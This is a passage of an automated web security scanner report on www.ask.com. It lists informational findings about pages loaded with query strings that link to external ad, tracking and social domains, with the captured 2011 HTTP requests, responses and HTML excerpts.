</span><a id="ftHelp" href="http://asksupport.custhelp.com/app/answers/list" class="txt3" target="_blank">Help</a>
...[SNIP]...
</script><script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...
<noscript><img src="http://b.scorecardresearch.com/p?c1=2&c2=6034776&c3=&c4=&c5=&c6=&c15=&cj=1" /></noscript>
...[SNIP]...
<noscript><iframe src="http://fls.doubleclick.net/activityi;src=2903398;type=homep773;cat=ask_h504;u1=2adc1d6f3adc1d6f3;u4=;u3=;u2=0;ord=-1329046005?" width="1" height="1" frameborder="0"></iframe>
...[SNIP]...

12.5. http://www.ask.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ask.com
Path:	/

Issue detail

The page was loaded from a URL containing a query string:

http://www.ask.com/?o=0&l=dir&qsrc=2990

The response contains the following links to other domains:

http://ad.doubleclick.net/adi/5480.iac.usa.ask.hp.x.x.dir/;sz=300x250;cata=sports;catb=sporting_goods;log=0;s=as;hhi=159;test=0;ord=1296157430052?
http://api.recaptcha.net/js/recaptcha_ajax.js
http://asksupport.custhelp.com/app/answers/list
http://b.scorecardresearch.com/p?c1=2&c2=6034776&c3=&c4=&c5=&c6=&c15=&cj=1
http://fls.doubleclick.net/activityi;src=2903398;type=homep773;cat=ask_e764;u1=0A4EDD4111C033B329ACD8C41BD460F3;u4=;u3=;u2=0;ord=-726965198?
http://hire.jobvite.com/CompanyJobs/Careers.aspx?c=qXY9VfwJ&su=fsY9Vfwe&cs=93q9Vfwh
http://twitter.com/askdotcom
http://www.facebook.com/AskDotCom

Request

GET /?o=0&l=dir&qsrc=2990 HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=252994457.1296155592.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=; tbe=1; qh=1-cmVndWxhdG9yK2JvYXQ.|cmVndWxhdG9yK2JvYXQrbm9ydGgrY2Fyb2xpbmE.; accepting=1; wz_scnt=1; gct=; puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjE1OjM2LVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5488|0~5489|0~5490|1; qc=0; clc=SW5kdXN0cmllcy9UcmFuc3BvcnRhdGlvbl9hbmRfTG9naXN0aWNzL01hcml0aW1lX1RyYW5zcG9ydA..; gcc=U3BvcnRzL1Nwb3J0aW5nX0dvb2Rz; cu.wz=0; gcht=; wz_sid=014DDB4118C033B329ACD8C41BD460F3; wz_uid=0A4EDD4111C033B329ACD8C41BD460F3; __utma=252994457.741105602.1296155592.1296155592.1296155592.1; __utmc=252994457; __utmb=252994457.3.10.1296155592; user=o=0&l=dir;

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Date: Thu, 27 Jan 2011 19:43:50 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cu.wz=0; Domain=.ask.com; Expires=Sat, 26-Jan-2013 19:43:49 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjQzOjQ5LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:43:49 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:43:49 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Content-Length: 93685

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"><html><head><title>Ask.com - What's Your Question?</title><meta name="description" content="Ask.com is the #1 question answering service that de
...[SNIP]...
<noscript><iframe id="adi" src="http://ad.doubleclick.net/adi/5480.iac.usa.ask.hp.x.x.dir/;sz=300x250;cata=sports;catb=sporting_goods;log=0;s=as;hhi=159;test=0;ord=1296157430052?" width="300" height="250" frameborder="0" scrolling="no"></iframe>
...[SNIP]...
</span><a class="facebook sprite" href="http://www.facebook.com/AskDotCom"></a><a class="twitter sprite" href="http://twitter.com/askdotcom"></a>
...[SNIP]...
</span><a id="ftCareers" href="http://hire.jobvite.com/CompanyJobs/Careers.aspx?c=qXY9VfwJ&su=fsY9Vfwe&cs=93q9Vfwh" class="txt3" >Careers</a>
...[SNIP]...
</span><a id="ftHelp" href="http://asksupport.custhelp.com/app/answers/list" class="txt3" target="_blank">Help</a>
...[SNIP]...
</script><script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...
<noscript><img src="http://b.scorecardresearch.com/p?c1=2&c2=6034776&c3=&c4=&c5=&c6=&c15=&cj=1" /></noscript>
...[SNIP]...
<noscript><iframe src="http://fls.doubleclick.net/activityi;src=2903398;type=homep773;cat=ask_e764;u1=0A4EDD4111C033B329ACD8C41BD460F3;u4=;u3=;u2=0;ord=-726965198?" width="1" height="1" frameborder="0"></iframe>
...[SNIP]...

12.6. http://www.ask.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ask.com
Path:	/

Issue detail

The page was loaded from a URL containing a query string:

http://www.ask.com/?q=Regulator+Wall+Clock&qsrc=6&o=0&l=dir

The response contains the following links to other domains:

http://ad.doubleclick.net/adi/5480.iac.usa.ask.hp.x.x.dir/;sz=300x250;cata=sports;catb=sporting_goods;log=0;s=as;hhi=159;test=0;ord=1296157431393?
http://api.recaptcha.net/js/recaptcha_ajax.js
http://asksupport.custhelp.com/app/answers/list
http://b.scorecardresearch.com/p?c1=2&c2=6034776&c3=&c4=&c5=&c6=&c15=&cj=1
http://fls.doubleclick.net/activityi;src=2903398;type=homep773;cat=ask_e764;u1=0A4EDD4111C033B329ACD8C41BD460F3;u4=;u3=;u2=0;ord=-895745508?
http://hire.jobvite.com/CompanyJobs/Careers.aspx?c=qXY9VfwJ&su=fsY9Vfwe&cs=93q9Vfwh
http://twitter.com/askdotcom
http://www.facebook.com/AskDotCom

Request

GET /?q=Regulator+Wall+Clock&qsrc=6&o=0&l=dir HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=252994457.1296155592.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=; tbe=1; qh=1-cmVndWxhdG9yK2JvYXQ.|cmVndWxhdG9yK2JvYXQrbm9ydGgrY2Fyb2xpbmE.; accepting=1; wz_scnt=1; gct=; puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjE1OjM2LVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5488|0~5489|0~5490|1; qc=0; clc=SW5kdXN0cmllcy9UcmFuc3BvcnRhdGlvbl9hbmRfTG9naXN0aWNzL01hcml0aW1lX1RyYW5zcG9ydA..; gcc=U3BvcnRzL1Nwb3J0aW5nX0dvb2Rz; cu.wz=0; gcht=; wz_sid=014DDB4118C033B329ACD8C41BD460F3; wz_uid=0A4EDD4111C033B329ACD8C41BD460F3; __utma=252994457.741105602.1296155592.1296155592.1296155592.1; __utmc=252994457; __utmb=252994457.3.10.1296155592; user=o=0&l=dir;

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Date: Thu, 27 Jan 2011 19:43:51 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cu.wz=0; Domain=.ask.com; Expires=Sat, 26-Jan-2013 19:43:51 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjQzOjUxLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:43:51 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:43:51 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Content-Length: 93807

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"><html><head><title>Ask.com - What's Your Question?</title><meta name="description" content="Ask.com is the #1 question answering service that de
...[SNIP]...
<noscript><iframe id="adi" src="http://ad.doubleclick.net/adi/5480.iac.usa.ask.hp.x.x.dir/;sz=300x250;cata=sports;catb=sporting_goods;log=0;s=as;hhi=159;test=0;ord=1296157431393?" width="300" height="250" frameborder="0" scrolling="no"></iframe>
...[SNIP]...
</span><a class="facebook sprite" href="http://www.facebook.com/AskDotCom"></a><a class="twitter sprite" href="http://twitter.com/askdotcom"></a>
...[SNIP]...
</span><a id="ftCareers" href="http://hire.jobvite.com/CompanyJobs/Careers.aspx?c=qXY9VfwJ&su=fsY9Vfwe&cs=93q9Vfwh" class="txt3" >Careers</a>
...[SNIP]...
</span><a id="ftHelp" href="http://asksupport.custhelp.com/app/answers/list" class="txt3" target="_blank">Help</a>
...[SNIP]...
</script><script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...
<noscript><img src="http://b.scorecardresearch.com/p?c1=2&c2=6034776&c3=&c4=&c5=&c6=&c15=&cj=1" /></noscript>
...[SNIP]...
<noscript><iframe src="http://fls.doubleclick.net/activityi;src=2903398;type=homep773;cat=ask_e764;u1=0A4EDD4111C033B329ACD8C41BD460F3;u4=;u3=;u2=0;ord=-895745508?" width="1" height="1" frameborder="0"></iframe>
...[SNIP]...

12.7. http://www.ask.com/ans previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ask.com
Path:	/ans

Issue detail

The page was loaded from a URL containing a query string:

http://www.ask.com/ans?qsrc=&o=0&l=dir&q=regulator+boat

The response contains the following links to other domains:

http://answers.yahoo.com/question/index?qid=20071018205431AAUL41n
http://ask.pronto.com/user/search.do?query=regulator+boat
http://ask.reference.com/related/A+Regulator+Gene+Produces+Which+of+the+Following?o=15096&l=dir
http://ask.reference.com/related/Air+Pressure+Regulator?o=15096&l=dir
http://ask.reference.com/related/CO2+Regulator?o=15096&l=dir
http://ask.reference.com/related/Contender+Boats?o=15096&l=dir
http://ask.reference.com/related/Fuel+Pressure+Regulator+Install?o=15096&l=dir
http://ask.reference.com/related/Fuel+Pressure+Regulator+Problems?o=15096&l=dir
http://ask.reference.com/related/Fuel+Pressure+Regulator?o=15096&l=dir
http://ask.reference.com/related/Rack+renting?o=15096&l=dir
http://ask.reference.com/related/Viking+Yacht?o=15096&l=dir
http://ask.reference.com/related/Warren+G?o=15096&l=dir
http://b.scorecardresearch.com/p?c1=2&c2=6034776&c3=&c4=&c5=&c6=&c15=&cj=1
http://my.boatus.com/forum/forum_posts.asp?TID=48278&PN=84&get=last
http://pixel1370.everesttech.net/1370/p?ev_transid=0A4EDD4111C033B329ACD8C41BD460F3&ev_clara_user=1&ev_clara_session_id=014DDB4118C033B329ACD8C41BD460F3&ev_clara_Sports/Sporting_Goods_query_id=D3C44EEC3B3D878C4B9BF746F65F79E2
http://switch.redcated/action/askane_ResultsCT90DayVT90Day_1
http://switch.redcated/iaction/askane_ResultsCT7DayVT1Day_4
http://www.birchlakeassociation.com/blquestionnaire.html
http://www.blurtit.com/q7889220.html
http://www.ci.davidson.nc.us/index.asp?nid=507
http://www.faqs.org/abstracts/Sports-and-fitness/The-float-plan-your-eyes-ashore-Why-the-fuss-about-the-new-Kiwi-boat-inspection-regulation.html
http://www.google.com/aclk?sa=L&ai=C4qwJgctBTdbPOIGagQesoPyJD8Kiyt4BktqohBaM05gsEAUgxZDVESgKUJ7OkMr8_____wFgyYajh9SjgBDIAQGqBBxP0PI4yt_nkMWB_PCqmZnNtLtYCikuW5AzThC1&num=5&sig=AGiWqtzMosGDBom7UX94xvBFoFUEIElu5Q&adurl=http://geo.peeplo.com/peeplo/search/%3Fq%3Dregulator%2520boats%26type%3Dweb%26from%3Dadgsp5
http://www.google.com/aclk?sa=L&ai=CKVk7gctBTdbPOIGagQesoPyJD7mE0JEB5bzl4g2WtePoBRAHIMWQ1REoClCappSzAmDJhqOH1KOAEMgBAaoEHE_Q4hfO3-WQxYH88dLWhs20u1gKKS5bkDNOELU&num=7&sig=AGiWqtxPFl3s7xQ4w3a8wnKtgBJ7fql01w&adurl=http://www.pronto.com/user/search.do%3FdisplayQuery%3Dboat%2520controller%26SEM%3Dtrue%26query%3Dboat%2520controller%26adid%3D1189390548-2826256-0_gs%26ref%3Dboat%2520controller%26creativeid%3D3593539869%26site%3D
http://www.google.com/aclk?sa=L&ai=CRohTgctBTdbPOIGagQesoPyJD6m56-UBwajxhRr2oegREAkgxZDVESgKUNibpfwBYMmGo4fUo4AQyAEBqgQcT9DCasrf65DFyfwDxQRA1lXIXwY39OuUWxFpyQ&num=9&sig=AGiWqtw56j98594NOijkPKtN7Vz_LwRjHA&adurl=http://www.nextag.com/goto.jsp%3Fp%3D5033%26search%3Dregulator%2520boat%26t%3Dag%253D617290353%26crid%3D27690872%26gg_aid%3D6899340753%26gg_site%3D
http://www.google.com/aclk?sa=L&ai=CyrIqgctBTdbPOIGagQesoPyJD6n3pJ4B5ZrwpxLfgdAFEAQgxZDVESgKUNvdkej7_____wFgyYajh9SjgBDIAQGqBBZP0LI90N_mkMWQ_WLTCf8QCKHq5VQ6&num=4&sig=AGiWqtyeIi9zhoeCD0tKYM-4VyuyS0Ac1Q&adurl=http://www.gatewaymarina.com/ship_store.html
http://www.google.com/aclk?sa=l&ai=C1rRBgctBTdbPOIGagQesoPyJD9vO8tsBi8y6yxe9rLMHEAMgxZDVESgKUPeXq-oFYMmGo4fUo4AQoAG50r__A8gBAaoEHE_Q0lje3-GQxYH8nbuWgM20u1gKKS5bkDNOELU&num=3&sig=AGiWqtze8LkewS6sDAVBH0udOn2tYGrpgg&adurl=http://www.rkdms.com/redirect%3Fc%3D177504256%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fwww.overtons.com%252Fsite_section%252Fboating_and_marine_section.shtml%253Fs_kwcid%253Dadwords_boat_parts
http://www.google.com/aclk?sa=l&ai=CLq00gctBTdbPOIGagQesoPyJD6Gt3D3Rh5_cA-vXuQgQCCDFkNURKApQurXcwgdgyYajh9SjgBCgAde7gf8DyAEBqgQZT9CSA9nf6pDFyfwD1AXhyrilgrotRgTpTw&num=8&sig=AGiWqtwAInSuzmyEagutrT21QgKH-KtdKg&adurl=http://www.boatbandit.com
http://www.google.com/aclk?sa=l&ai=CPTwogctBTdbPOIGagQesoPyJD9mMmrkBo_i48haS7bcFEAEgxZDVESgKUJOe7bP4_____wFgyYajh9SjgBCgAav6jugDyAEBqgQZT9CCVvLf45DFyfwD1AXhyrilgrotRgTpTw&num=1&sig=AGiWqtzt40dVnBUavc14Cfk7KlwPLfe-Ag&adurl=http://www.vertexfd.com
http://www.google.com/aclk?sa=l&ai=CaayBgctBTdbPOIGagQesoPyJD5yQkeEBpIyLrBTc66IsEAIgxZDVESgKUKuO7fEFYMmGo4fUo4AQoAGA6M38A8gBAaoEGU_Q8gXS3-CQxcn8A9QF4cq4pYK6LUYE6U8&num=2&sig=AGiWqtzv86tqbbBjKdkUNZa_279EdfzGyA&adurl=http://tracking.searchmarketing.com/click.asp%3FAID%3D757733697%26CAPCID%3D5362083404
http://www.google.com/aclk?sa=l&ai=CbpvDgctBTdbPOIGagQesoPyJD7uDmdQBs5a0vBad5rY0EAogxZDVESgKUN-vkL8BYMmGo4fUo4AQoAGF2f_kA8gBAakCERiDOCMLtz6qBB9P0NIczd_okMXJ_APFBEqZN8hfBjf065RbEWnJc8wP&num=10&sig=AGiWqty5AEuKcQ7jOdICv6hb5hVvJ9Gitw&adurl=http://www.best-deal.com/search/landing/query/parts%2Bboats/s/google/koid/8140617321/
http://www.google.com/aclk?sa=l&ai=CqPBrgctBTdbPOIGagQesoPyJD-2R_78Br7bGshWQqMEHEAYgxZDVESgKUIX6pcj8_____wFgyYajh9SjgBCgAafk0foDyAEBqQLk-rgrfNawPqoEH0_Qkj_t3-SQxcn8A8UELuVrx18GN_TrlFsRaclzzA8&num=6&sig=AGiWqtw99Sm14Es4gtjDrzG_bpsrad8eXg&adurl=http://www.BoaterExam.com/usa/DistrictOfColumbia/
http://www.lakenormancvb.com/faq.html
http://www.multihulls4us.com/forums/showthread.php?s=14065e4b9223420cb786576341daa96c&t=2208
http://www.vdh.virginia.gov/EnvironmentalHealth/Wastewater/faq/index.htm
http://www.yachtingnz.org.nz/NewsletterDetail.aspx?NewsletterID=306

Request

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Date: Thu, 27 Jan 2011 19:46:10 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cu.wz=0; Domain=.ask.com; Expires=Sat, 26-Jan-2013 19:46:09 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjQ2OjA5LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:46:09 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:46:09 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Content-Length: 179383

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">

<html>
<head>

<title>

...[SNIP]...
<div>
<a onmousedown="navigatetoShopping(this);return ct(this, 43464)"
href="http://ask.pronto.com/user/search.do?query=regulator+boat">
Shopping
</a>
...[SNIP]...

<a href="http://www.google.com/aclk?sa=l&ai=CPTwogctBTdbPOIGagQesoPyJD9mMmrkBo_i48haS7bcFEAEgxZDVESgKUJOe7bP4_____wFgyYajh9SjgBCgAav6jugDyAEBqgQZT9CCVvLf45DFyfwD1AXhyrilgrotRgTpTw&num=1&sig=AGiWqtzt40dVnBUavc14Cfk7KlwPLfe-Ag&adurl=http://www.vertexfd.com" rel="nofollow" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(23); if (typeof efclk != 'undefined') efclk(23); return pk(this,{en:'gg',io:'0',b:'spl',tp:'top',ec:'3',ex:'sgcl%3D3998wL-is5qg78%26sgch%3D'},'gg_0');" class="nu" onmouseover="return ss('www.vertexfd.com')" onmouseout="cs()" style="display:block;padding:15px 20px 10px 20px;">

...[SNIP]...

<a href="http://www.google.com/aclk?sa=l&ai=CaayBgctBTdbPOIGagQesoPyJD5yQkeEBpIyLrBTc66IsEAIgxZDVESgKUKuO7fEFYMmGo4fUo4AQoAGA6M38A8gBAaoEGU_Q8gXS3-CQxcn8A9QF4cq4pYK6LUYE6U8&num=2&sig=AGiWqtzv86tqbbBjKdkUNZa_279EdfzGyA&adurl=http://tracking.searchmarketing.com/click.asp%3FAID%3D757733697%26CAPCID%3D5362083404" rel="nofollow" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(94); if (typeof efclk != 'undefined') efclk(94); return pk(this,{en:'gg',io:'1',b:'spl',tp:'top',ec:'3',ex:'sgcl%3D3998wL-is5qg78%26sgch%3D'},'gg_1');" class="nu" onmouseover="return ss('www.wholesalemarine.com')" onmouseout="cs()" style="display:block;padding:0px 20px 10px 20px;">

...[SNIP]...

<a href="http://www.google.com/aclk?sa=l&ai=C1rRBgctBTdbPOIGagQesoPyJD9vO8tsBi8y6yxe9rLMHEAMgxZDVESgKUPeXq-oFYMmGo4fUo4AQoAG50r__A8gBAaoEHE_Q0lje3-GQxYH8nbuWgM20u1gKKS5bkDNOELU&num=3&sig=AGiWqtze8LkewS6sDAVBH0udOn2tYGrpgg&adurl=http://www.rkdms.com/redirect%3Fc%3D177504256%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fwww.overtons.com%252Fsite_section%252Fboating_and_marine_section.shtml%253Fs_kwcid%253Dadwords_boat_parts" rel="nofollow" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(16); if (typeof efclk != 'undefined') efclk(16); return pk(this,{en:'gg',io:'2',b:'spl',tp:'top',ec:'3',ex:'sgcl%3D3998wL-is5qg78%26sgch%3D'},'gg_2');" class="nu" onmouseover="return ss('overtons.com')" onmouseout="cs()" style="display:block;padding:0px 20px 0px 20px;margin-bottom:15px;">

...[SNIP]...
<div style="margin-bottom:8px;">
<a onmousedown="return pk(this,{en:'af',io:'0',b:'sa',tp:'d',ec:'10'});" href="http://www.vdh.virginia.gov/EnvironmentalHealth/Wastewater/faq/index.htm" class="q_top_q_link b">What are the Virginia Department of Health's <b>
...[SNIP]...

  <a onmousedown="return pk(this,{en:'af',io:'0',b:'sa',tp:'d',ec:'10'});" href="http://www.vdh.virginia.gov/EnvironmentalHealth/Wastewater/faq/index.htm" class="L1">See entire page »</a>
...[SNIP]...
<div style="margin-bottom:8px;">
<a onmousedown="return pk(this,{en:'af',io:'1',b:'sa',tp:'d',ec:'10'});" href="http://www.ci.davidson.nc.us/index.asp?nid=507" class="q_top_q_link b">How and why does the Town of Davidson <b>
...[SNIP]...

  <a onmousedown="return pk(this,{en:'af',io:'1',b:'sa',tp:'d',ec:'10'});" href="http://www.ci.davidson.nc.us/index.asp?nid=507" class="L1">See entire page »</a>
...[SNIP]...
<div style="margin-bottom:8px;">
<a onmousedown="return pk(this,{en:'af',io:'2',b:'sa',tp:'d',ec:'10'});" href="http://www.lakenormancvb.com/faq.html" class="q_top_q_link b">Who helps <b>
...[SNIP]...

  <a onmousedown="return pk(this,{en:'af',io:'2',b:'sa',tp:'d',ec:'10'});" href="http://www.lakenormancvb.com/faq.html" class="L1">See entire page »</a>
...[SNIP]...
<div>
<a name="anchq_0" onmousedown="return pk(this,{en:'af',io:'3',b:'sa',tp:'d',ec:'10'});" href="http://answers.yahoo.com/question/index?qid=20071018205431AAUL41n" class="L4">Do we have law or <b>
...[SNIP]...
<div>
<a name="anchq_1" onmousedown="return pk(this,{en:'af',io:'4',b:'sa',tp:'d',ec:'10'});" href="http://www.blurtit.com/q7889220.html" class="L4">Where Can I Buy A <b>
...[SNIP]...
<div>
<a name="anchq_2" onmousedown="return pk(this,{en:'af',io:'5',b:'sa',tp:'d',ec:'10'});" href="http://www.faqs.org/abstracts/Sports-and-fitness/The-float-plan-your-eyes-ashore-Why-the-fuss-about-the-new-Kiwi-boat-inspection-regulation.html" class="L4">Why the fuss about the new Kiwi <b>
...[SNIP]...
<div>
<a name="anchq_3" onmousedown="return pk(this,{en:'af',io:'6',b:'sa',tp:'d',ec:'10'});" href="http://www.birchlakeassociation.com/blquestionnaire.html" class="L4">Do you believe there should be more strict <b>
...[SNIP]...
<div>
<a name="anchq_4" onmousedown="return pk(this,{en:'af',io:'7',b:'sa',tp:'d',ec:'10'});" href="http://www.multihulls4us.com/forums/showthread.php?s=14065e4b9223420cb786576341daa96c&t=2208" class="L4">Is there a professional association who <b>
...[SNIP]...
<div>
<a name="anchq_5" onmousedown="return pk(this,{en:'af',io:'8',b:'sa',tp:'d',ec:'10'});" href="http://my.boatus.com/forum/forum_posts.asp?TID=48278&PN=84&get=last" class="L4">IP Logged Hello all, Has anyone heard about the new <b>
...[SNIP]...
<div>
<a name="anchq_6" onmousedown="return pk(this,{en:'af',io:'9',b:'sa',tp:'d',ec:'10'});" href="http://www.yachtingnz.org.nz/NewsletterDetail.aspx?NewsletterID=306" class="L4">Does the <b>
...[SNIP]...

<a href="http://www.google.com/aclk?sa=l&ai=CPTwogctBTdbPOIGagQesoPyJD9mMmrkBo_i48haS7bcFEAEgxZDVESgKUJOe7bP4_____wFgyYajh9SjgBCgAav6jugDyAEBqgQZT9CCVvLf45DFyfwD1AXhyrilgrotRgTpTw&num=1&sig=AGiWqtzt40dVnBUavc14Cfk7KlwPLfe-Ag&adurl=http://www.vertexfd.com" rel="nofollow" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(47); if (typeof efclk != 'undefined') efclk(47); return pk(this,{en:'gg',io:'0',b:'spl',tp:'bot',ec:'5',ex:'sgcl%3D3998wL-is5qg78%26sgch%3D'},'gg_0');" class="nu" onmouseover="return ss('www.vertexfd.com')" onmouseout="cs()" style="display:block;padding:15px 20px 10px 20px;">

...[SNIP]...

<a href="http://www.google.com/aclk?sa=l&ai=CaayBgctBTdbPOIGagQesoPyJD5yQkeEBpIyLrBTc66IsEAIgxZDVESgKUKuO7fEFYMmGo4fUo4AQoAGA6M38A8gBAaoEGU_Q8gXS3-CQxcn8A9QF4cq4pYK6LUYE6U8&num=2&sig=AGiWqtzv86tqbbBjKdkUNZa_279EdfzGyA&adurl=http://tracking.searchmarketing.com/click.asp%3FAID%3D757733697%26CAPCID%3D5362083404" rel="nofollow" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(40); if (typeof efclk != 'undefined') efclk(40); return pk(this,{en:'gg',io:'1',b:'spl',tp:'bot',ec:'5',ex:'sgcl%3D3998wL-is5qg78%26sgch%3D'},'gg_1');" class="nu" onmouseover="return ss('www.wholesalemarine.com')" onmouseout="cs()" style="display:block;padding:0px 20px 10px 20px;">

...[SNIP]...

<a href="http://www.google.com/aclk?sa=l&ai=C1rRBgctBTdbPOIGagQesoPyJD9vO8tsBi8y6yxe9rLMHEAMgxZDVESgKUPeXq-oFYMmGo4fUo4AQoAG50r__A8gBAaoEHE_Q0lje3-GQxYH8nbuWgM20u1gKKS5bkDNOELU&num=3&sig=AGiWqtze8LkewS6sDAVBH0udOn2tYGrpgg&adurl=http://www.rkdms.com/redirect%3Fc%3D177504256%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fwww.overtons.com%252Fsite_section%252Fboating_and_marine_section.shtml%253Fs_kwcid%253Dadwords_boat_parts" rel="nofollow" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(35); if (typeof efclk != 'undefined') efclk(35); return pk(this,{en:'gg',io:'2',b:'spl',tp:'bot',ec:'5',ex:'sgcl%3D3998wL-is5qg78%26sgch%3D'},'gg_2');" class="nu" onmouseover="return ss('overtons.com')" onmouseout="cs()" style="display:block;padding:0px 20px 10px 20px;">

...[SNIP]...

<a href="http://www.google.com/aclk?sa=L&ai=CyrIqgctBTdbPOIGagQesoPyJD6n3pJ4B5ZrwpxLfgdAFEAQgxZDVESgKUNvdkej7_____wFgyYajh9SjgBDIAQGqBBZP0LI90N_mkMWQ_WLTCf8QCKHq5VQ6&num=4&sig=AGiWqtyeIi9zhoeCD0tKYM-4VyuyS0Ac1Q&adurl=http://www.gatewaymarina.com/ship_store.html" rel="nofollow" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(56); if (typeof efclk != 'undefined') efclk(56); return pk(this,{en:'gg',io:'3',b:'spl',tp:'bot',ec:'5',ex:'sgcl%3D3998wL-is5qg78%26sgch%3D'},'gg_3');" class="nu" onmouseover="return ss('www.gatewaymarina.com')" onmouseout="cs()" style="display:block;padding:0px 20px 10px 20px;">

...[SNIP]...

<a href="http://www.google.com/aclk?sa=L&ai=C4qwJgctBTdbPOIGagQesoPyJD8Kiyt4BktqohBaM05gsEAUgxZDVESgKUJ7OkMr8_____wFgyYajh9SjgBDIAQGqBBxP0PI4yt_nkMWB_PCqmZnNtLtYCikuW5AzThC1&num=5&sig=AGiWqtzMosGDBom7UX94xvBFoFUEIElu5Q&adurl=http://geo.peeplo.com/peeplo/search/%3Fq%3Dregulator%2520boats%26type%3Dweb%26from%3Dadgsp5" rel="nofollow" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(34); if (typeof efclk != 'undefined') efclk(34); return pk(this,{en:'gg',io:'4',b:'spl',tp:'bot',ec:'5',ex:'sgcl%3D3998wL-is5qg78%26sgch%3D'},'gg_4');" class="nu" onmouseover="return ss('peeplo.com/<b>Regulator+Boat</b>s')" onmouseout="cs()" style="display:block;padding:0px 20px 15px 20px;">

...[SNIP]...

